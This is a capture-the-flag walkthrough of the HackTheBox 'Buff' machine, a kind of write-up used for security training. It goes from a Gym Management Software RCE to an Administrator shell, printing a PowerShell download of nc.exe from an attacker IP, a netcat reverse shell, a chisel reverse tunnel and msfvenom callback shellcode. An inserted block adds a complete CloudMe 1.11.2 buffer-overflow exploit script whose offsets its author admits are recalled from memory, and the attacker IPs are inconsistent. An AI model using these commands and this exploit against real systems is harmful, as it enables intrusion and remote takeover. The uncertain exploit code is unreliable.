Buff

Nmap

nmap -sC -sV -T5 -p- 10.10.10.198                 

PORT     STATE SERVICE    REASON          VERSION
7680/tcp open  pando-pub? syn-ack ttl 127
8080/tcp open  http       syn-ack ttl 127 Apache httpd 2.4.43 ((Win64) OpenSSL/1.1.1g PHP/7.4.6)
| http-open-proxy: Potentially OPEN proxy.
|_Methods supported:CONNECTION
|_http-server-header: Apache/2.4.43 (Win64) OpenSSL/1.1.1g PHP/7.4.6
|_http-title: mrb3n's Bro Hut

User

The Contact page reveals which software the site is built on:

mrb3n’s Bro Hut
Made using Gym Management Software 1.0

searchsploit gym
--------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                       |  Path
--------------------------------------------------------------------- ---------------------------------
Gym Management System 1.0 - Unauthenticated Remote Code Execution    | php/webapps/48506.py
WordPress Plugin WPGYM - SQL Injection                               | php/webapps/42801.txt
--------------------------------------------------------------------- ---------------------------------

searchsploit -m 48506
python2 48506.py http://10.10.10.198:8080/

The exploit gives us a limited, non-interactive web shell. To upgrade it, serve nc.exe over HTTP from the attacking host, pull it onto the box, and have it call back to a listener waiting on port 9090:

powershell iwr http://10.10.14.17:8000/nc.exe -outfile c:\windows\system32\spool\drivers\color\nc.exe

c:\windows\system32\spool\drivers\color\nc.exe 10.10.14.28 9090 -e powershell.exe
PS C:\users\shaun\desktop> cat user.txt

164d26cfe2c92c27278f8826955af9f6

Administrator

In shaun's Downloads directory we find an installer:

c:\users\shaun\downloads\cloudme_1112.exe

Checking open ports with netstat, we also see port 8888 listening on 127.0.0.1 only, so it cannot be reached from the attacking host directly.

It has to be forwarded with chisel: a reverse server on the attacking host, then the client on the box mapping its local 8888 back to us:

./chisel server -p 9009 --reverse
powershell iwr http://10.10.14.28/chisel.exe -outfile c:\windows\system32\spool\drivers\color\chisel.exe

c:\windows\system32\spool\drivers\color\chisel.exe client 10.10.14.28:9009 R:127.0.0.1:8888:127.0.0.1:8888

The service behind 8888 is CloudMe 1.11.2 (the version is in the installer's file name), and there is a public exploit for it:

searchsploit cloudme
------------------------------------------------ ---------------------------------
 Exploit Title                                  |  Path
------------------------------------------------ ---------------------------------
CloudMe 1.11.2 - Buffer Overflow (PoC)          | windows/remote/48389.py
CloudMe 1.11.2 - Buffer Overflow (SEH_DEP_ASLR) | windows/local/48499.txt
------------------------------------------------ ---------------------------------


searchsploit -m 48389

The PoC's shellcode has to be replaced with one that calls back to us. Generate it with msfvenom, excluding the bad characters the PoC lists (\x00, \x0a, \x0d), and paste the output into 48389.py in place of its payload:

msfvenom -a x86 -p windows/exec CMD='c:\windows\system32\spool\drivers\color\nc.exe 10.10.14.28 9091 -e cmd.exe' -b '\x00\x0A\x0D' -f python

With a listener on port 9091, run the modified PoC. It connects to 127.0.0.1:8888, which chisel forwards to the box; CloudMe runs with Administrator privileges, so the callback shell lands as Administrator:
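The payload swap the PoC needs, as an added example that is not the exploit's own code nor the author's: it assumes the buffer layout I recall from EDB-ID 48389 (1052 bytes of padding, the jmp esp address 0x68A842B5, a 30-byte NOP sled, target 127.0.0.1:8888), so check those constants against the copy you mirrored with searchsploit before using it. Instead of pasting the `-f python` output, it reads shellcode written with `msfvenom ... -f raw -o sc.bin` and refuses to send a buffer containing any of the bad characters. SAMPLE_SHELLCODE is a constructed placeholder so the script runs offline; the file path and function names are mine.

```python
import socket
import sys

# Layout of the CloudMe 1.11.2 PoC (EDB-ID 48389) as I recall it; verify these
# constants against the copy you mirrored with searchsploit -m 48389.
PADDING_LEN = 1052                 # bytes before the saved return address
EIP = b"\xb5\x42\xa8\x68"          # 0x68A842B5, a jmp esp in Qt5Core.dll (assumption)
NOP_SLED = b"\x90" * 30            # execution slides into the shellcode
BAD_CHARS = b"\x00\x0a\x0d"        # the set excluded with msfvenom -b

# Where the PoC connects: 127.0.0.1:8888 is the chisel reverse forward to the box.
TARGET = ("127.0.0.1", 8888)

# Constructed placeholder shellcode (int3 x 16) so the script runs offline;
# replace it with the output of msfvenom -f raw.
SAMPLE_SHELLCODE = b"\xcc" * 16


def find_bad_chars(data: bytes, bad: bytes = BAD_CHARS) -> list:
    """Return the sorted list of bad-char byte values present in data."""
    return sorted({b for b in bad if b in data})


def build_buffer(shellcode: bytes) -> bytes:
    """Assemble padding + EIP + NOP sled + shellcode, refusing bad chars."""
    offending = find_bad_chars(shellcode)
    if offending:
        raise ValueError("shellcode contains bad chars: "
                         + ", ".join("0x%02x" % b for b in offending))
    return b"\x90" * PADDING_LEN + EIP + NOP_SLED + shellcode


def load_shellcode(path: str) -> bytes:
    """Read raw shellcode written by: msfvenom ... -b '\\x00\\x0a\\x0d' -f raw -o sc.bin"""
    with open(path, "rb") as fh:
        return fh.read()


def send_buffer(buf: bytes, target=TARGET) -> int:
    """Deliver the buffer to CloudMe over the forwarded port; returns bytes sent."""
    with socket.create_connection(target, timeout=5) as sock:
        return sock.send(buf)


if __name__ == "__main__":
    # Usage: python3 cloudme_bof.py sc.bin   (with nc -lvnp 9091 already waiting)
    shellcode = load_shellcode(sys.argv[1]) if len(sys.argv) > 1 else SAMPLE_SHELLCODE
    buf = build_buffer(shellcode)
    print("sending %d bytes (shellcode %d bytes)" % (len(buf), len(shellcode)))
    send_buffer(buf)
```

The bad-char check matters here because a single \x00 or newline inside the shellcode truncates or corrupts the request before it reaches the vulnerable copy, and the failure mode is simply no callback; checking locally is cheaper than guessing why the listener stays silent.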
C:\Users\Administrator\Desktop>type root.txt

e68b54b30f0***b08fe51d65770
